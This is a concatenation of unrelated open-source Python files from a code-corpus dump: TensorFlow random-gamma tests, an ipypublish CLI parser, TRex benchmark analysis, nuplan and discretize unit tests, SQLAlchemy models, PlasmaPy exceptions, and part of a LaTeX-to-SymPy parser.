# It takes i multiplications to calculate one i-th moment.
error_per_moment = i * 1e-6
total_variance = (
moments_i_var / moments_sample_count[i] + error_per_moment)
if not total_variance:
total_variance = 1e-10
# z_test is approximately a unit normal distribution.
z_test = abs(
(moments[i] - moments_i_mean) / math.sqrt(total_variance))
self.assertLess(z_test, z_limit)
except ImportError as e:
tf.logging.warn('Cannot test stats functions: %s' % str(e))
"""
# Asserts that different trials (1000 samples per trial) is unlikely
# to see the same sequence of values. Will catch buggy
# implementations which uses the same random number seed.
def testDistinct(self):
for use_gpu in [False, True]:
for dt in tf.float16, tf.float32, tf.float64:
sampler = self._Sampler(1000, 2.0, 1.0, dt, use_gpu=use_gpu)
x = sampler()
y = sampler()
# Number of different samples.
count = (x == y).sum()
count_limit = 20 if dt == tf.float16 else 10
if count >= count_limit:
print(use_gpu, dt)
print("x = ", x)
print("y = ", y)
print("count = ", count)
self.assertLess(count, count_limit)
# Checks that the CPU and GPU implementation returns the same results,
# given the same random seed
def testCPUGPUMatch(self):
for dt in tf.float16, tf.float32, tf.float64:
results = {}
for use_gpu in [False, True]:
sampler = self._Sampler(1000, 0.0, 1.0, dt, use_gpu=use_gpu, seed=12345)
results[use_gpu] = sampler()
if dt == tf.float16:
self.assertAllClose(results[False], results[True], rtol=1e-3, atol=1e-3)
else:
self.assertAllClose(results[False], results[True], rtol=1e-6, atol=1e-6)
def testSeed(self):
for use_gpu in [False, True]:
for dt in tf.float16, tf.float32, tf.float64:
sx = self._Sampler(1000, 0.0, 1.0, dt, use_gpu=use_gpu, seed=345)
sy = self._Sampler(1000, 0.0, 1.0, dt, use_gpu=use_gpu, seed=345)
self.assertAllEqual(sx(), sy())
def testNoCSE(self):
"""CSE = constant subexpression eliminator.
SetIsStateful() should prevent two identical random ops from getting
merged.
"""
for dtype in tf.float16, tf.float32, tf.float64:
for use_gpu in [False, True]:
with self.test_session(use_gpu=use_gpu):
rnd1 = tf.random_gamma([24], 2.0, dtype=dtype)
rnd2 = tf.random_gamma([24], 2.0, dtype=dtype)
diff = rnd2 - rnd1
self.assertGreater(np.linalg.norm(diff.eval()), 0.1)
def testShape(self):
# Fully known shape.
rnd = tf.random_gamma([150], 2.0)
self.assertEqual([150], rnd.get_shape().as_list())
rnd = tf.random_gamma([150], 2.0, beta=[3.0, 4.0])
self.assertEqual([150, 2], rnd.get_shape().as_list())
rnd = tf.random_gamma([150], tf.ones([1, 2, 3]))
self.assertEqual([150, 1, 2, 3], rnd.get_shape().as_list())
rnd = tf.random_gamma([20, 30], tf.ones([1, 2, 3]))
self.assertEqual([20, 30, 1, 2, 3], rnd.get_shape().as_list())
rnd = tf.random_gamma([123], tf.placeholder(tf.float32, shape=(2,)))
self.assertEqual([123, 2], rnd.get_shape().as_list())
# Partially known shape.
rnd = tf.random_gamma(tf.placeholder(tf.int32, shape=(1,)), tf.ones([7, 3]))
self.assertEqual([None, 7, 3], rnd.get_shape().as_list())
rnd = tf.random_gamma(tf.placeholder(tf.int32, shape=(3,)), tf.ones([9, 6]))
self.assertEqual([None, None, None, 9, 6], rnd.get_shape().as_list())
# Unknown shape.
rnd = tf.random_gamma(tf.placeholder(tf.int32), tf.placeholder(tf.float32))
self.assertIs(None, rnd.get_shape().ndims)
rnd = tf.random_gamma([50], tf.placeholder(tf.float32))
self.assertIs(None, rnd.get_shape().ndims)
if __name__ == "__main__":
tf.test.main()
|
ipypublish/frontend/shared.py | parmentelat/ipypublish | 220 | 11195235 | <filename>ipypublish/frontend/shared.py
import sys
import os
import argparse
import fnmatch
from ipypublish import __version__
from ipypublish.convert.config_manager import iter_all_export_infos
class CustomFormatter(
argparse.ArgumentDefaultsHelpFormatter, argparse.RawDescriptionHelpFormatter
):
pass
class CustomParser(argparse.ArgumentParser):
def error(self, message):
sys.stderr.write("error: %s\n" % message)
self.print_help()
sys.exit(2)
def get_parser(**kwargs):
return CustomParser(formatter_class=CustomFormatter, **kwargs)
def get_plugin_str(plugin_folder_paths, regex, verbose):
"""return string listing all available export configurations """
outstrs = []
# outstrs.append('Available Export Configurations')
# outstrs.append('-------------------------------')
configs = [
e
for e in iter_all_export_infos(plugin_folder_paths, get_mime=verbose)
if fnmatch.fnmatch(e["key"], "*{}*".format(regex))
]
for item in sorted(configs, key=lambda i: (i["class"], i["key"])):
outstrs.append("- Key: {}".format(item["key"]))
outstrs.append(" Class: {}".format(item["class"]))
path = item["path"].split(os.path.sep)
if verbose:
outstrs.append(" Type: {}".format(item["mime_type"]))
path = os.path.join(*path)
else:
path = os.path.join("...", *path[-3:])
if len(path) < 4:
outstrs.append(" Path: {}".format(item["path"]))
else:
outstrs.append(" Path: {}".format(path))
outstrs.append(" About: {}".format(item["description"][0].strip()))
if verbose:
for descript in item["description"][1:]:
outstrs.append(" {}".format(descript.strip()))
# note could wrap description (less than x characters)
outstrs.append(" ")
return "\n".join(outstrs)
def parse_options(sys_args, program):
if program not in ["nbpublish", "nbpresent"]:
raise ValueError("program should be nbpublish or nbpresent")
if program == "nbpresent":
parser = get_parser(
description=(
"load reveal.js slides as a web server,\n"
"converting from ipynb first "
"if path extension is `ipynb`"
)
)
file_help = "path to html or ipynb file"
default_key = "slides_ipypublish_main"
else:
parser = get_parser(
description=(
"convert one or more Jupyter notebooks " "to a publishable format"
)
)
file_help = "notebook file or directory"
default_key = "latex_ipypublish_main"
parser.add_argument("--version", action="version", version=__version__)
parser.add_argument(
"filepath", type=str, nargs="?", help=file_help, metavar="filepath"
)
parser.add_argument(
"-f",
"--outformat",
type=str,
metavar="key|filepath",
help=(
"export format configuration to use, "
"can be a key name or path to the file"
),
default=default_key,
)
export_group = parser.add_argument_group("export configurations")
export_group.add_argument(
"-ep",
"--export-paths",
action="append",
metavar="path",
type=str,
help=("add additional folder paths, " "containing export configurations"),
default=[],
)
export_group.add_argument(
"-le",
"--list-exporters",
type=str,
metavar="filter",
nargs="?",
const="*",
help=("list export configurations, " "optionally filtered e.g. -le html*"),
)
export_group.add_argument(
"-lv",
"--list-verbose",
action="store_true",
help=("when listing export configurations, " "give a verbose description"),
)
nbmerge_group = parser.add_argument_group("nb merge")
nbmerge_group.add_argument(
"-i",
"--ignore-prefix",
type=str,
metavar="str",
default="_",
help="ignore ipynb files with this prefix",
)
output_group = parser.add_argument_group("output")
output_group.add_argument(
"-o",
"--outpath",
type=str,
metavar="str",
help="path to output converted files",
default=os.path.join(os.getcwd(), "converted"),
)
# output_group.add_argument("-d","--dump-files", action="store_true",
# help='dump external files, '
# 'linked to in the document, into the outpath')
output_group.add_argument(
"-c",
"--clear-files",
action="store_true",
help=("clear any external files " "that already exist in the outpath"),
)
if program == "nbpublish":
pdf_group = parser.add_argument_group("pdf export")
pdf_group.add_argument(
"-pdf",
"--create-pdf",
action="store_true",
help="convert to pdf (only if latex exporter)",
)
pdf_group.add_argument(
"-ptemp",
"--pdf-in-temp",
action="store_true",
help=(
"run pdf conversion in a temporary folder"
" and only copy back the .pdf file"
),
)
pdf_group.add_argument(
"-pbug",
"--pdf-debug",
action="store_true",
help="run latexmk in interactive mode",
)
view_group = parser.add_argument_group("view output")
view_group.add_argument(
"-lb",
"--launch-browser",
action="store_true",
help="open the output in an available web-browser",
)
debug_group = parser.add_argument_group("debugging")
debug_group.add_argument(
"-log",
"--log-level",
type=str,
default="info",
choices=["debug", "info", "warning", "error"],
help="the logging level to output to screen/file",
)
debug_group.add_argument(
"-pt",
"--print-traceback",
action="store_true",
help=("print the full exception traceback"),
)
debug_group.add_argument(
"-dr",
"--dry-run",
action="store_true",
help=("perform a 'dry run', " "which will not output any files"),
)
args = parser.parse_args(sys_args)
options = vars(args)
filepath = options.pop("filepath")
list_plugins = options.pop("list_exporters")
list_verbose = options.pop("list_verbose")
if filepath is None and list_plugins:
parser.exit(
message=get_plugin_str(options["export_paths"], list_plugins, list_verbose)
)
elif filepath is None:
parser.error("no filepath specified")
return filepath, options
|
doc/TRexDataAnalysis.py | timgates42/trex-core | 956 | 11195241 | #!/scratch/Anaconda2.4.0/bin/python
import pandas as pd
import numpy as np
import matplotlib
matplotlib.use('Agg')
from matplotlib import pyplot as plt
from matplotlib import dates as matdates
from matplotlib import lines as matlines
import os
import time
from datetime import datetime
"""
This Module is structured to work with a raw data at the following JSON format:
{'setup_name': {'test1_name':[QUERY1,QUERY2,QUERY3],
'test2_name':[QUERY1,QUERY2,QUERY3]
}
'setup_name2': {'test1_name':[QUERY1,QUERY2,QUERY3],
'test2_name':[QUERY1,QUERY2,QUERY3]
}
}
The Query structure is set (currently) to this:
(test_name,state, date,hour,minute,mpps_result,mpps_min,mpps_max,build_id) example:
["syn attack - 64 bytes, single CPU", "stl", "20161226", "01", "39", "9.631898", "9.5", "11.5", "54289"]
it can be changed to support other formats of queries, simply change the query class to support your desired structure
the query class specify the indexes of the data within the query tuple
"""
class TestQuery(object):
QUERY_TIMEFORMAT = "%Y/%m/%d %H:%M:%S" # date format in the query
QUERY_TIMESTAMP = 1
QUERY_MPPS_RESULT = 2
QUERY_BUILD_ID = 3
class Test:
def __init__(self, name, setup_name, end_date):
self.name = name
self.setup_name = setup_name
self.end_date = end_date
self.stats = [] # tuple
self.results_df = [] # dataFrame
self.latest_result = [] # float
self.latest_result_date = '' # string
def analyze_all_test_data(self, raw_test_data):
test_results = []
test_dates = []
test_build_ids = []
for query in raw_test_data:
# date_formatted = time.strftime("%d-%m-%Y",
# time.strptime(query[int(TestQuery.QUERY_DATE)], TestQuery.query_dateformat))
# time_of_res = date_formatted + '-' + query[int(TestQuery.QUERY_HOUR)] + ':' + query[
# int(TestQuery.QUERY_MINUTE)]
time_of_query = time.strptime(query[TestQuery.QUERY_TIMESTAMP], TestQuery.QUERY_TIMEFORMAT)
time_formatted = time.strftime("%d-%m-%Y-%H:%M", time_of_query)
test_dates.append(time_formatted)
test_results.append(float(query[int(TestQuery.QUERY_MPPS_RESULT)]))
test_build_ids.append(query[int(TestQuery.QUERY_BUILD_ID)])
test_results_df = pd.DataFrame({self.name: test_results, self.name + ' Date': test_dates,
"Setup": ([self.setup_name] * len(test_results)), "Build Id": test_build_ids},
dtype='str')
stats_avg = float(test_results_df[self.name].mean())
stats_min = float(test_results_df[self.name].min())
stats_max = float(test_results_df[self.name].max())
stats = tuple(
[stats_avg, stats_min, stats_max,
float(test_results_df[self.name].std()),
float(((stats_max - stats_min) / stats_avg) * 100),
len(test_results)]) # stats = (avg_mpps,min,max,std,error, no of test_results) error = ((max-min)/avg)*100
self.latest_result = float(test_results_df[self.name].iloc[-1])
self.latest_result_date = str(test_results_df[test_results_df.columns[3]].iloc[-1])
self.results_df = test_results_df
self.stats = stats
class Setup:
def __init__(self, name, end_date, raw_setup_data):
self.name = name
self.end_date = end_date # string of date
self.tests = [] # list of test objects
self.all_tests_data_table = pd.DataFrame() # dataframe
self.setup_trend_stats = pd.DataFrame() # dataframe
self.latest_test_results = pd.DataFrame() # dataframe
self.raw_setup_data = raw_setup_data # dictionary
self.test_names = raw_setup_data.keys() # list of names
def analyze_all_tests(self):
for test_name in self.test_names:
t = Test(test_name, self.name, self.end_date)
t.analyze_all_test_data(self.raw_setup_data[test_name])
self.tests.append(t)
def analyze_latest_test_results(self):
test_names = []
test_dates = []
test_latest_results = []
for test in self.tests:
test_names.append(test.name)
test_dates.append(test.latest_result_date)
test_latest_results.append(test.latest_result)
self.latest_test_results = pd.DataFrame(
{'Date': test_dates, 'Test Name': test_names, 'MPPS\Core (Norm)': test_latest_results},
index=range(1, len(test_latest_results) + 1))
self.latest_test_results = self.latest_test_results[[2, 1, 0]] # re-order columns to name|MPPS|date
def analyze_all_tests_stats(self):
test_names = []
all_test_stats = []
for test in self.tests:
test_names.append(test.name)
all_test_stats.append(test.stats)
self.setup_trend_stats = pd.DataFrame(all_test_stats, index=test_names,
columns=['Avg MPPS/Core (Norm)', 'Min', 'Max', 'Std', 'Error (%)',
'Total Results'])
self.setup_trend_stats.index.name = 'Test Name'
def analyze_all_tests_trend(self):
all_tests_trend_data = []
for test in self.tests:
all_tests_trend_data.append(test.results_df)
self.all_tests_data_table = reduce(lambda x, y: pd.merge(x, y, how='outer'), all_tests_trend_data)
def plot_trend_graph_all_tests(self, save_path='', file_name='_trend_graph.png'):
time_format1 = '%d-%m-%Y-%H:%M'
time_format2 = '%Y-%m-%d-%H:%M'
for test in self.tests:
test_data = test.results_df[test.results_df.columns[2]].tolist()
test_time_stamps = test.results_df[test.results_df.columns[3]].tolist()
start_date = test_time_stamps[0]
test_time_stamps.append(self.end_date + '-23:59')
test_data.append(test_data[-1])
float_test_time_stamps = []
for ts in test_time_stamps:
try:
float_test_time_stamps.append(matdates.date2num(datetime.strptime(ts, time_format1)))
except:
float_test_time_stamps.append(matdates.date2num(datetime.strptime(ts, time_format2)))
plt.plot_date(x=float_test_time_stamps, y=test_data, label=test.name, fmt='.-', xdate=True)
plt.legend(fontsize='small', loc='best')
plt.ylabel('MPPS/Core (Norm)')
plt.title('Setup: ' + self.name)
plt.tick_params(
axis='x',
which='both',
bottom='off',
top='off',
labelbottom='off')
plt.xlabel('Time Period: ' + start_date[:-6] + ' - ' + self.end_date)
if save_path:
plt.savefig(os.path.join(save_path, self.name + file_name))
if not self.setup_trend_stats.empty:
(self.setup_trend_stats.round(2)).to_csv(os.path.join(save_path, self.name +
'_trend_stats.csv'))
plt.close('all')
def plot_latest_test_results_bar_chart(self, save_path='', img_file_name='_latest_test_runs.png',
stats_file_name='_latest_test_runs_stats.csv'):
plt.figure()
colors_for_bars = ['b', 'g', 'r', 'c', 'm', 'y']
self.latest_test_results[[1]].plot(kind='bar', legend=False,
color=colors_for_bars) # plot only mpps data, which is in column 1
plt.xticks(rotation='horizontal')
plt.xlabel('Index of Tests')
plt.ylabel('MPPS/Core (Norm)')
plt.title("Test Runs for Setup: " + self.name)
if save_path:
plt.savefig(os.path.join(save_path, self.name + img_file_name))
(self.latest_test_results.round(2)).to_csv(
os.path.join(save_path, self.name + stats_file_name))
plt.close('all')
def analyze_all_setup_data(self):
self.analyze_all_tests()
self.analyze_latest_test_results()
self.analyze_all_tests_stats()
self.analyze_all_tests_trend()
def plot_all(self, save_path=''):
self.plot_latest_test_results_bar_chart(save_path)
self.plot_trend_graph_all_tests(save_path)
def latest_runs_comparison_bar_chart(setup_name1, setup_name2, setup1_latest_result, setup2_latest_result,
save_path=''
):
s1_res = setup1_latest_result[[0, 1]] # column0 is test name, column1 is MPPS\Core
s2_res = setup2_latest_result[[0, 1, 2]] # column0 is test name, column1 is MPPS\Core, column2 is Date
s1_res.columns = ['Test Name', setup_name1]
s2_res.columns = ['Test Name', setup_name2, 'Date']
compare_dframe = pd.merge(s1_res, s2_res, on='Test Name')
compare_dframe.plot(kind='bar')
plt.legend(fontsize='small', loc='best')
plt.xticks(rotation='horizontal')
plt.xlabel('Index of Tests')
plt.ylabel('MPPS/Core (Norm)')
plt.title("Comparison between " + setup_name1 + " and " + setup_name2)
if save_path:
plt.savefig(os.path.join(save_path, "_comparison.png"))
compare_dframe = compare_dframe.round(2)
compare_dframe.to_csv(os.path.join(save_path, '_comparison_stats_table.csv'))
# WARNING: if the file _all_stats.csv already exists, this script deletes it, to prevent overflowing of data
def create_all_data(ga_data, end_date, save_path='', detailed_test_stats=False):
all_setups = {}
all_setups_data = []
setup_names = ga_data.keys()
for setup_name in setup_names:
s = Setup(setup_name, end_date, ga_data[setup_name])
s.analyze_all_setup_data()
s.plot_all(save_path)
all_setups_data.append(s.all_tests_data_table)
all_setups[setup_name] = s
if detailed_test_stats:
if os.path.exists(os.path.join(save_path, '_detailed_table.csv')):
os.remove(os.path.join(save_path, '_detailed_table.csv'))
if all_setups_data:
all_setups_data_dframe = pd.DataFrame().append(all_setups_data)
all_setups_data_dframe.to_csv(os.path.join(save_path, '_detailed_table.csv'))
trex19setup = all_setups['trex19']
trex08setup = all_setups['trex08']
latest_runs_comparison_bar_chart('Mellanox ConnectX-5',
'Intel XL710', trex19setup.latest_test_results,
trex08setup.latest_test_results,
save_path=save_path)
|
nuplan/planning/training/callbacks/utils/test/test_scenario_scoring_callback.py | motional/nuplan-devkit | 128 | 11195257 | <gh_stars>100-1000
import json
import pathlib
import tempfile
import unittest
from typing import Tuple
from unittest.mock import Mock
import torch
from nuplan.common.actor_state.state_representation import StateSE2
from nuplan.planning.scenario_builder.abstract_scenario import AbstractScenario
from nuplan.planning.scenario_builder.test.mock_abstract_scenario import MockAbstractScenario
from nuplan.planning.training.callbacks.scenario_scoring_callback import ScenarioScoringCallback, _score_model
from nuplan.planning.training.callbacks.utils.scenario_scene_converter import ScenarioSceneConverter
from nuplan.planning.training.data_loader.scenario_dataset import ScenarioDataset
from nuplan.planning.training.modeling.types import FeaturesType, TargetsType
from nuplan.planning.training.preprocessing.test.dummy_vectormap_builder import DummyVectorMapFeature
def mock_compute_features(scenario: AbstractScenario) -> Tuple[FeaturesType, TargetsType]:
"""
Mock feature computation.
:param scenario: Input scenario to extract features from.
:return: Extracted features and targets.
"""
mission_goal = scenario.get_mission_goal()
data1 = torch.tensor(mission_goal.x)
data2 = torch.tensor(mission_goal.y)
data3 = torch.tensor(mission_goal.heading)
mock_feature = DummyVectorMapFeature(data1=[data1], data2=[data2], data3=[{"test": data3}])
mock_output = {'mock_feature': mock_feature}
return mock_output, mock_output
def mock_predict(features: FeaturesType) -> FeaturesType:
"""
Mock prediction function.
:param features: Input feature tensor.
:return: Predicted tensor.
"""
return features
def mock_compute_objective(prediction: FeaturesType, target: TargetsType) -> torch.Tensor:
"""
Mock computation of objective.
:param prediction: Prediction tensor.
:param target: Target tensor.
:return: Computed objective tensor.
"""
return target['mock_feature'].data1[0]
class TestScenarioScoringCallback(unittest.TestCase):
"""Test scenario scoring callback"""
def setUp(self) -> None:
"""Set up test case."""
self.output_dir = tempfile.TemporaryDirectory()
# setup scenario dataset
preprocessor = Mock()
preprocessor.compute_features.side_effect = mock_compute_features
self.mock_scenarios = [
MockAbstractScenario(mission_goal=StateSE2(x=1.0, y=0.0, heading=0.0)),
MockAbstractScenario(mission_goal=StateSE2(x=0.0, y=0.0, heading=0.0)),
]
self.scenario_time_stamp = self.mock_scenarios[0]._initial_time_us
self.scenario_token = self.mock_scenarios[0].token
mock_scenario_dataset = ScenarioDataset(scenarios=self.mock_scenarios, feature_preprocessor=preprocessor)
# setup datamodule
mock_datamodule = Mock()
mock_datamodule.val_dataloader().dataset = mock_scenario_dataset
# setup trainer
self.trainer = Mock()
self.trainer.datamodule = mock_datamodule
self.trainer.current_epoch = 1
# setup objective
mock_objective = Mock()
mock_objective.compute.side_effect = mock_compute_objective
# setup lightning module
self.pl_module = Mock()
self.pl_module.device = "cpu"
self.pl_module.side_effect = mock_predict
self.pl_module.objectives = [mock_objective]
# setup callback
scenario_converter = ScenarioSceneConverter(ego_trajectory_horizon=1, ego_trajectory_poses=2)
self.callback = ScenarioScoringCallback(
scene_converter=scenario_converter, num_store=1, frequency=1, output_dir=self.output_dir.name
)
self.callback._initialize_dataloaders(self.trainer.datamodule)
def test_initialize_dataloaders(self) -> None:
"""
Test callback dataloader initialization.
"""
invalid_datamodule = Mock()
invalid_datamodule.val_dataloader().dataset = None
# test invalid dataset assertion
with self.assertRaises(AssertionError):
self.callback._initialize_dataloaders(invalid_datamodule)
# test valid dataset instance
self.callback._initialize_dataloaders(self.trainer.datamodule)
self.assertIsInstance(self.callback._val_dataloader, torch.utils.data.DataLoader)
def test_score_model(self) -> None:
"""
Test scoring of the model with mock features.
"""
data1 = torch.tensor(1)
data2 = torch.tensor(2)
data3 = torch.tensor(3)
mock_feature = DummyVectorMapFeature(data1=[data1], data2=[data2], data3=[{"test": data3}])
mock_input = {'mock_feature': mock_feature}
score, prediction = _score_model(self.pl_module, mock_input, mock_input)
self.assertEqual(score, mock_feature.data1[0])
self.assertEqual(prediction, mock_input)
def test_on_validation_epoch_end(self) -> None:
"""
Test on validation callback.
"""
self.callback._initialize_dataloaders(self.trainer.datamodule)
self.callback.on_validation_epoch_end(self.trainer, self.pl_module)
# Assert files are generated
best_score_path = pathlib.Path(
self.output_dir.name
+ f"/scenes/epoch={self.trainer.current_epoch}"
+ f"/best/{self.scenario_token}/{self.scenario_time_stamp.time_us}.json"
)
self.assertTrue(best_score_path.exists())
worst_score_path = pathlib.Path(
self.output_dir.name
+ f"/scenes/epoch={self.trainer.current_epoch}"
+ f"/worst/{self.scenario_token}/{self.scenario_time_stamp.time_us}.json"
)
self.assertTrue(worst_score_path.exists())
random_score_path = pathlib.Path(
self.output_dir.name
+ f"/scenes/epoch={self.trainer.current_epoch}"
+ f"/random/{self.scenario_token}/{self.scenario_time_stamp.time_us}.json"
)
self.assertTrue(random_score_path.exists())
# Make sure the right json files are generated
with open(str(best_score_path), "r") as f:
best_data = json.load(f)
with open(str(worst_score_path), "r") as f:
worst_data = json.load(f)
self.assertEqual(worst_data["goal"]["pose"][0], self.mock_scenarios[0].get_mission_goal().x)
self.assertEqual(best_data["goal"]["pose"][0], self.mock_scenarios[1].get_mission_goal().x)
if __name__ == '__main__':
unittest.main()
|
ffsubsync/__init__.py | Lucas-C/ffsubsync | 4,533 | 11195267 | # -*- coding: utf-8 -*-
import logging
import sys
try:
from rich.console import Console
from rich.logging import RichHandler
# configure logging here because some other later imported library does it first otherwise
# TODO: use a fileconfig
logging.basicConfig(
level=logging.INFO,
format="%(message)s",
datefmt="[%X]",
handlers=[RichHandler(console=Console(file=sys.stderr))],
)
except ImportError:
logging.basicConfig(stream=sys.stderr, level=logging.INFO)
from .version import __version__ # noqa
from .ffsubsync import main # noqa
|
tests/base/test_tensor_omf.py | ckohnke/discretize | 123 | 11195284 | <gh_stars>100-1000
import numpy as np
import unittest
import discretize
try:
import omf
except ImportError:
has_omf = False
else:
has_omf = True
if has_omf:
from discretize.mixins.omf_mod import unravel_data_array, ravel_data_array
class TestTensorMeshOMF(unittest.TestCase):
def setUp(self):
h = np.ones(16)
mesh = discretize.TensorMesh([h, 2 * h, 3 * h])
self.mesh = mesh
def test_to_omf(self):
mesh = self.mesh
vec = np.arange(mesh.nC)
models = {"arange": vec}
omf_element = mesh.to_omf(models)
geom = omf_element.geometry
# Check geometry
self.assertEqual(mesh.nC, geom.num_cells)
self.assertEqual(mesh.nN, geom.num_nodes)
self.assertTrue(np.allclose(mesh.hx, geom.tensor_u))
self.assertTrue(np.allclose(mesh.hy, geom.tensor_v))
self.assertTrue(np.allclose(mesh.hz, geom.tensor_w))
self.assertTrue(np.allclose(mesh.axis_u, geom.axis_u))
self.assertTrue(np.allclose(mesh.axis_v, geom.axis_v))
self.assertTrue(np.allclose(mesh.axis_w, geom.axis_w))
self.assertTrue(np.allclose(mesh.x0, geom.origin))
# Check data arrays
self.assertEqual(len(models.keys()), len(omf_element.data))
for i in range(len(omf_element.data)):
name = list(models.keys())[i]
scalar_data = omf_element.data[i]
self.assertEqual(name, scalar_data.name)
arr = unravel_data_array(
np.array(scalar_data.array), mesh.nCx, mesh.nCy, mesh.nCz
)
self.assertTrue(np.allclose(models[name], arr))
def test_from_omf(self):
omf_element = omf.VolumeElement(
name="vol_ir",
geometry=omf.VolumeGridGeometry(
axis_u=[1, 1, 0],
axis_v=[0, 0, 1],
axis_w=[1, -1, 0],
tensor_u=np.ones(10).astype(float),
tensor_v=np.ones(15).astype(float),
tensor_w=np.ones(20).astype(float),
origin=[10.0, 10.0, -10],
),
data=[
omf.ScalarData(
name="Random Data",
location="cells",
array=np.random.rand(10, 15, 20).flatten(),
)
],
)
# Make a discretize mesh
mesh, models = discretize.TensorMesh.from_omf(omf_element)
geom = omf_element.geometry
# Check geometry
self.assertEqual(mesh.nC, geom.num_cells)
self.assertEqual(mesh.nN, geom.num_nodes)
self.assertTrue(np.allclose(mesh.hx, geom.tensor_u))
self.assertTrue(np.allclose(mesh.hy, geom.tensor_v))
self.assertTrue(np.allclose(mesh.hz, geom.tensor_w))
self.assertTrue(np.allclose(mesh.axis_u, geom.axis_u))
self.assertTrue(np.allclose(mesh.axis_v, geom.axis_v))
self.assertTrue(np.allclose(mesh.axis_w, geom.axis_w))
self.assertTrue(np.allclose(mesh.x0, geom.origin))
# Check data arrays
self.assertEqual(len(models.keys()), len(omf_element.data))
for i in range(len(omf_element.data)):
name = list(models.keys())[i]
scalar_data = omf_element.data[i]
self.assertEqual(name, scalar_data.name)
arr = ravel_data_array(
models[name],
len(geom.tensor_u),
len(geom.tensor_v),
len(geom.tensor_w),
)
self.assertTrue(np.allclose(np.array(scalar_data.array), arr))
if __name__ == "__main__":
unittest.main()
|
tests/test_page.py | cobolbaby/python-seo-analyzer | 743 | 11195293 | <gh_stars>100-1000
from seoanalyzer import page
def test_page_init():
p = page.Page(url='https://www.sethserver.com/sitemap.xml', base_domain='https://www.sethserver.com/')
assert p.base_domain.scheme == 'https'
assert p.base_domain.netloc == 'www.sethserver.com'
assert p.base_domain.path == '/'
assert p.url == 'https://www.sethserver.com/sitemap.xml'
assert p.title == ''
assert p.description == ''
assert p.keywords == {}
assert p.warnings == []
assert p.links == []
def test_analyze():
p = page.Page(url='https://www.sethserver.com/', base_domain='https://www.sethserver.com/')
assert p.analyze()
|
mlcomp/db/models/computer.py | megachester/mlcomp | 166 | 11195316 | <filename>mlcomp/db/models/computer.py
import sqlalchemy as sa
from sqlalchemy import ForeignKey
from mlcomp.db.models.base import Base
from mlcomp.utils.misc import now
class Computer(Base):
__tablename__ = 'computer'
name = sa.Column(sa.String, primary_key=True)
gpu = sa.Column(sa.Integer, default=0)
cpu = sa.Column(sa.Integer, default=1)
memory = sa.Column(sa.Float, default=0.1)
usage = sa.Column(sa.String)
ip = sa.Column(sa.String)
port = sa.Column(sa.Integer)
user = sa.Column(sa.String)
last_synced = sa.Column(sa.DateTime)
disk = sa.Column(sa.Integer)
syncing_computer = sa.Column(sa.String, ForeignKey('computer.name'))
root_folder = sa.Column(sa.String)
can_process_tasks = sa.Column(sa.Boolean)
sync_with_this_computer = sa.Column(sa.Boolean)
meta = sa.Column(sa.String)
class ComputerUsage(Base):
__tablename__ = 'computer_usage'
id = sa.Column(sa.Integer, primary_key=True)
computer = sa.Column(sa.String, ForeignKey('computer.name'))
usage = sa.Column(sa.String)
time = sa.Column(sa.DateTime, default=now())
__all__ = ['Computer', 'ComputerUsage']
|
plasmapy/utils/exceptions.py | seanjunheng2/PlasmaPy | 429 | 11195334 | """Exceptions and warnings specific to PlasmaPy."""
__all__ = [
"PlasmaPyError",
"PhysicsError",
"InvalidRomanNumeralError",
"OutOfRangeError",
"RelativityError",
"RomanError",
"PlasmaPyWarning",
"CouplingWarning",
"PhysicsWarning",
"PlasmaPyDeprecationWarning",
"PlasmaPyFutureWarning",
"RelativityWarning",
]
# ------------------------------------------------------------------------------
# Exceptions
# ------------------------------------------------------------------------------
class PlasmaPyError(Exception):
"""
Base class of PlasmaPy custom errors.
All custom exceptions raised by PlasmaPy should inherit from this
class and be defined in this module.
"""
pass
class PhysicsError(PlasmaPyError, ValueError):
"""
The base exception for physics-related errors.
"""
pass
class RomanError(PlasmaPyError):
"""A base exception for errors from `plasmapy.utils.roman`."""
pass
# ^^^^^^^^^^^^ Base Exceptions should be defined above this comment ^^^^^^^^^^^^
class RelativityError(PhysicsError):
"""
An exception for speeds greater than the speed of light.
"""
pass
class OutOfRangeError(RomanError):
"""
An exception to be raised for integers that outside of the range
that can be converted to Roman numerals.
"""
pass
class InvalidRomanNumeralError(RomanError):
"""
An exception to be raised when the input is not a valid Roman
numeral.
"""
pass
# ------------------------------------------------------------------------------
# Warnings
# ------------------------------------------------------------------------------
class PlasmaPyWarning(Warning):
"""
Base class of PlasmaPy custom warnings.
All PlasmaPy custom warnings should inherit from this class and be
defined in this module.
Warnings should be issued using `warnings.warn`, which will not break
execution if unhandled.
"""
pass
class PhysicsWarning(PlasmaPyWarning):
"""The base warning for warnings related to non-physical situations."""
pass
# ^^^^^^^^^^^^^ Base Warnings should be defined above this comment ^^^^^^^^^^^^^
class RelativityWarning(PhysicsWarning):
"""
A warning for when relativistic velocities are being used in or are
returned by non-relativistic functionality.
"""
pass
class CouplingWarning(PhysicsWarning):
"""
A warning for functions that rely on a particular coupling regime to
be valid.
"""
pass
class PlasmaPyDeprecationWarning(PlasmaPyWarning, DeprecationWarning):
"""
A warning for deprecated features when the warning is intended for
other Python developers.
"""
pass
class PlasmaPyFutureWarning(PlasmaPyWarning, FutureWarning):
"""
A warning for deprecated features when the warning is intended for
end users of PlasmaPy.
"""
pass
|
process_latex.py | PhysicsTeacher13/latex-to-sym-py | 339 | 11195358 | <reponame>PhysicsTeacher13/latex-to-sym-py<gh_stars>100-1000
import sympy
import antlr4
from antlr4.error.ErrorListener import ErrorListener
from gen.PSParser import PSParser
from gen.PSLexer import PSLexer
from gen.PSListener import PSListener
from sympy.printing.str import StrPrinter
def process_sympy(sympy):
matherror = MathErrorListener(sympy)
stream = antlr4.InputStream(sympy)
lex = PSLexer(stream)
lex.removeErrorListeners()
lex.addErrorListener(matherror)
tokens = antlr4.CommonTokenStream(lex)
parser = PSParser(tokens)
# remove default console error listener
parser.removeErrorListeners()
parser.addErrorListener(matherror)
relation = parser.math().relation()
expr = convert_relation(relation)
return expr
class MathErrorListener(ErrorListener):
def __init__(self, src):
super(ErrorListener, self).__init__()
self.src = src
def syntaxError(self, recog, symbol, line, col, msg, e):
fmt = "%s\n%s\n%s"
marker = "~" * col + "^"
if msg.startswith("missing"):
err = fmt % (msg, self.src, marker)
elif msg.startswith("no viable"):
err = fmt % ("I expected something else here", self.src, marker)
elif msg.startswith("mismatched"):
names = PSParser.literalNames
expected = [names[i] for i in e.getExpectedTokens() if i < len(names)]
if expected < 10:
expected = " ".join(expected)
err = (fmt % ("I expected one of these: " + expected,
self.src, marker))
else:
